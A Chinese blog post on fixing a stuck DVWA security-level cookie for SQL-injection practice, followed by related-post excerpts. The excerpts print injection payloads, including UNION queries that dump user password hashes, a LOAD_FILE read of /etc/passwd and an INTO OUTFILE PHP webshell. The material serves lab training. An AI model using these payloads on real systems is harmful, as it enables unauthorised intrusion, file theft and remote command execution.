dvwa中SQL注入遇到的网站安全等级问题

原创 已于 2023-12-25 21:37:08 修改 · 656 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #mysql

于 2023-12-25 17:52:23 首次发布
文章讲述了在网站设置为低安全等级时,由于存在SQL注入漏洞,用户提交的1会被误识别为SQL语句。解决方法是删除安全级别中的某个值,将安全等级降低,消除token,同时提及通过修改服务器文件将默认安全设置改为low来防止漏洞利用。

当设置网站安全等级为low后,网站居然存在token并且提交的1'无法被判定为是SQL语句

当抓包后发现居然发现security有两个值

于是把第一个删了就可以将安全等级降为low从而token值无效没了用处

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
错误信息提示了在的SQL语句中存在一个未被识别的语法部分,是由于不正确的引号使用导致的问题。这种错误通常会阻止数据库执行查询或操作,因它无法识别或解释输入的SQL语句。所以说这里把用户输入的内容直接拼接到了SQL语句中,存在SQL注入漏洞。


补充:后来发现这个无论怎么提交security的变化网页显示还是impossible

索性将服务器文件改一下把default改为low(根据实际需求)

这样就算网页显示为impossible但实际上是low,token不见了。

U.cool
关注
[网络安全]DVWASQL注入—High level解题简析 [网络安全]DVWASQL注入—High level解
2401_88752464的博客
01-05 481
由以上两个回显可知,该注入类型为字符型注入。由以上两个回显可知,注入点个数为两个。
DVWA——SQL注入
m0_74426634的博客
04-07 1648
日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA修改问题解决
weixin_42075643的博客
02-18 3087
DVWA平台上进行测试时,会出现等了,但是有的模块是impossible的情况:我是这样解决的 1、先清空浏览器的缓存(这里可以清空最近的,就是打开DVWA之后的清空就可以了e.g:最近一小时) 2、退出DVWA,重新登录 3、换了浏览器,URL粘贴只把DVWA的根目录粘贴过去要有vulnerabilities 例如:http://localhost/DVWA即可 4、重启浏览器 …应该就可以解决了 ...
dvwa无法修改 一直impossible 已解决
hello world
02-14 5422
问题DVWA Security中将等修改成了low,但是某个模块还是impossible 解决 假设同时在火狐和谷歌登录了admin账号。火狐运行正常,可是谷歌无法将某个模块修改成low。 解决方法就是:两个浏览器同时退出账号,并在谷歌上删除缓存,或者稍等片刻,打开无痕窗口并访问你的ip或域名/dvwa 这里要加上/vulnerabilities/某个模块名/ 登录后再次设置安全等级成low即可。 参考:[求助]新人求助!!为什么我将DVWA别调为low了,但是在用burpsuit
DVWA难度等无法问题
自在如风
09-05 8599
针对这种情况,需要将之前登录的痕迹抹去,以火狐浏览器为例,退出dvwa登录状态后,将缓存cookie清除,这个只需要进入定制里有个抹去痕迹拖入工具栏即可,以后即可随时清除痕迹。然后重新登录即可成功设计难度等。 如果同时开了多个浏览器,登录dvwa,需要全部退出,并抹去痕迹,重新登录即可。 亲测可用。 ...
DVWA1.9 如何更安全级别
weixin_44092573的博客
02-07 2689
点击DVWA security 依次点击,选择
dvwa无法修改问题
欢迎来到我的博客
03-22 789
在使用burp时出现两个等 cookie="security=impossible; security=low… 原因:在多个浏览器登录了burp 解决:退出所有登录账号,删除浏览器缓存,重新登录,修改(需要等一段时间才能生效) 转载:https://blog.youkuaiyun.com/qq_34626094/article/details/113129346 ...
DVWASQL注入漏洞细说
Xlucas的博客
07-29 681
Medium别:就是多了mysqli_real_escape_string 这个函数,这个函数转义字符串中的特殊字符。3、当我们输入 1' union select user,password from users# 的时候可以获取到DB用户和用户对应的md5密码。1、我们在SQL Injection中输入 1' and 1=1# 和 1' and 1=2#。2、当我们输入 1' union select user(),database() #的时候可以获取到DB用户和DB名字。
DVWASQL注入
geejkse_seff的博客
07-30 467
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
dvwa靶场中(Medium)安全等级sql注入
白帽小学二年级的博客
12-16 1607
sql注入教程详解 使用burpsuite将抓到的数据包转发到repeater模块 (burpsuite使用前需要将浏览器设置代理 判断是int还是str类型,显然是int类型 用order by关键字进行数据表中列数的判断 1 order by 1,2 //正常显示 1 order by 1,2,3 //报错,所以是两列 1 and 1=2 union select 1,database() //联合注入获取数据库名 1 a...
DVWA练习sql注入设置等low解决方法
qq_51627054的博客
12-09 775
但是有些明明已经删除了但是还是修改,很大概率是因为你在其他浏览器DVWA也进行了登录,就可能会造成冲突,比如你现在使用的edge浏览器,可能你电脑还有其他的浏览器,比如谷歌,火狐等等。只需要把其他浏览器信息的cookie值删除,最好默认使用一个浏览器登录即可,在安全等级设置low就可以进行学习使用了。1.DVWA是个很好的一个练习web渗透一个靶场网站,包含很多,例如sql注入漏洞、xss漏洞、文件上传漏洞等等。7.成功解决这个问题,如果能帮到你可以点个关注,以后也会多多更新遇见的问题和解决方法的。
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio
热门推荐
BFELFISH的博客
06-04 1万+
数据库进行操作时出错,百度了n多个解决方法后,看到有个是把关键字当表名了,我就尝试在MySQL中建立查询,发现后面怎么都出错,然后,将order重命名为orders后,再查询,过了。后了解到是因为order是关键字 如果是别的出现这个错误,但是没有用order的,可以考虑是sql写错了,可以先在数据库中建立查询测试一下。 百度了这么多,总结主要解决方法 1.SQL语句写错 先...
You have an error in your SQL syntax的解决方法
sjz168的专栏
07-16 1298
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near..... 花了好几天,总算明白了,原来使用了MySQL的关健字做字段名了
DVWA进行sql注入
weixin_44901204的博客
08-23 488
1.判断是否有注入漏洞 打开DVWA,在SQL注入中输入1,返回正常。 输入1’,报错,返回 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1...
DVWA [SQL Injection]
weixin_45253622的博客
05-22 2139
DVWA [SQL Injection] Low Medium High Impossible 漏洞防御 Low 是个提交查询的地方,我们输入1 and 1=1,1 and 1=2发现; 发现回显同,存在sql注入,我们输入1' 报错如下图,得知闭合方式为单引号闭合; 猜测后台sql语句为下: select Firstname,Surname from 表名 where id = '输入的id' 源码如下: <?php if( isset( $...
DVWA安全等级,一直卡在一个
weixin_48083470的博客
05-29 2762
关于DVWA安全等级,一直卡在一个 今天在DVWA平台做实验,出现了问题,换到想要的安全等级: 自己动手找找问题,他是通过传参数来确定等的,那就用burpsuite抓一下看看 当你把这个安全等级删了再发出去,会发现到了high这个页面。。。。。 这个多出来的安全等级cookie也知道哪里来的,页面每次刷新都会自动加上去。。。。 浏览器的cookie缓存清空了也还是会这样 如果有大佬看到知道怎么回事的希望能指点一下 解决办法 上面删除的方法太麻烦了,而且对于盲注high的分页注入
DVWA靶机-暴力破解(Brute Force)
weixin_43726831的博客
10-11 3584
DVWA靶机-暴力破解 1.DVWA靶机的4个安全等级 DVWA Security分为四个等,low,medium,high,impossible,同的安全等级对应了同的漏洞等。 1.low-最低安全等级,无任何安全措施,通过简单毫无安全性的编码展示了安全漏洞。 2.medium-中等安全等级,有安全措施的保护,但是安全性并强。 3.high-高等安全等级,有安全措施保护,是中等安全等级...
2021-08-04
qq_36303446的博客
08-04 267
DVWA-Brute Force 暴力破解Security-LowSecurity-MediumSecurity-Highnotice四种攻击方式: 登进去DVWA的原始账号密码是 admin;password。 刚开始的时候,有个cookie的问题了security的等:抓包的时候有两个 security,一个impossible,一个low; 1.首先你要把浏览器的cookie清除; 2.退出DVWA,重开浏览器; 3.浏览器的URL:http://127.0.0.1/DVWA访问就行; 4.重
DVWA-SQL注入全等绕过方法
03-29 3221
DVWA-SQL注入全等绕过方法前言一、Low别union注入判断字段数查表名查字段二、Medium别二、High别总结一些初学疑问为什么要加个单引号’,闭合到底是怎么用? 前言   在开始之前,先说一下我对SQL注入的原理的一些理解: SQL注入   是在输入的字符串中注入SQL指令,在设计良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而执行,因此遭到数据泄漏或者数据的破坏。   攻击者可以从数据库中获取敏感数据,造成大量敏感信息泄露;修改数据库内容,
dvwasql注入
最新发布
07-06
### 3.2 DVWA 中的 SQL 注入测试与实践指南 DVWA(Damn Vulnerable Web Application)是一个专为安全研究人员和渗透测试人员设计的易受攻击的 Web 应用程序,常用于学习和练习 Web 安全漏洞的检测与利用方法。其中,SQL 注入SQL Injection)是其核心模块之一,可用于理解并实践 SQLi 攻击的基本原理和技术手段。 #### 3.2.1 设置与访问 DVWA 环境 在开始之前,需确保本地或远程环境中已部署好 DVWA。通常可使用 XAMPP 或 LAMP 套件进行部署,并通过浏览器访问 `http://localhost/dvwa` 登录界面。首次运行时需点击“Create / Reset Database”按钮初始化数据库结构。 进入设置页面后,将安全等级(Security Level)调整为 `low`,以便于进行 SQL 注入测试。此模式下未对输入做任何过滤或转义处理,便于初学者观察攻击流程[^1]。 #### 3.2.2 SQL 注入基础测试流程 以 DVWA 的“SQL Injection”页面为例,用户可通过输入用户名来查询对应的用户信息。攻击者可以尝试注入恶意字符串以绕过逻辑判断或读取敏感数据。 ##### 示例:获取当前数据库名称 ```sql ' UNION SELECT NULL, database() -- - ``` 该语句利用了 `UNION SELECT` 将原始查询结果与注入内容合并输出,并借助注释符 `-- -` 忽略后续可能存在的代码片段。若应用未对输入进行有效校验,则会返回当前数据库名。 ##### 示例:获取数据库版本信息 ```sql ' UNION SELECT NULL, version() -- - ``` 该命令可获取 MySQL 版本信息,有助于进一步判断目标环境是否支持特定功能,如 `LOAD_FILE()`、`INTO OUTFILE` 等高危函数。 #### 3.2.3 利用 SQL 注入读取服务器文件 若 MySQL 配置中启用了 `local_infile` 功能,攻击者可尝试通过 `LOAD DATA INFILE` 或 `LOAD_FILE()` 函数读取服务器上的文件内容。例如: ```sql ' UNION SELECT NULL, LOAD_FILE('/etc/passwd') -- - ``` 此操作可读取服务器上的敏感配置文件(如 `/etc/passwd`),前提是当前数据库用户具有相应权限且文件路径存在。需要注意的是,此类行为属于非法入侵活动,在真实网络环境中实施前必须获得授权。 #### 3.2.4 利用 SQL 注入写入 WebShell 当具备写入权限时,可尝试将 PHP 代码写入 Web 目录,从而实现远程代码执行。例如: ```sql ' UNION SELECT NULL, "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php' -- - ``` 成功执行后,可通过访问 `http://target/shell.php?cmd=id` 执行任意系统命令。此类攻击方式危害极大,应在可控实验环境中进行测试。 #### 3.2.5 防御建议与最佳实践 - **参数化查询**:使用预编译语句(Prepared Statement)替代字符串拼接,从根本上防止 SQL 注入。 - **最小权限原则**:限制数据库用户的权限,避免授予必要的文件读写权限。 - **输入验证与过滤**:对所有用户输入进行严格校验,拒绝非法字符组合。 - **错误信息控制**:关闭详细错误输出,防止攻击者通过报错信息推测内部结构。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值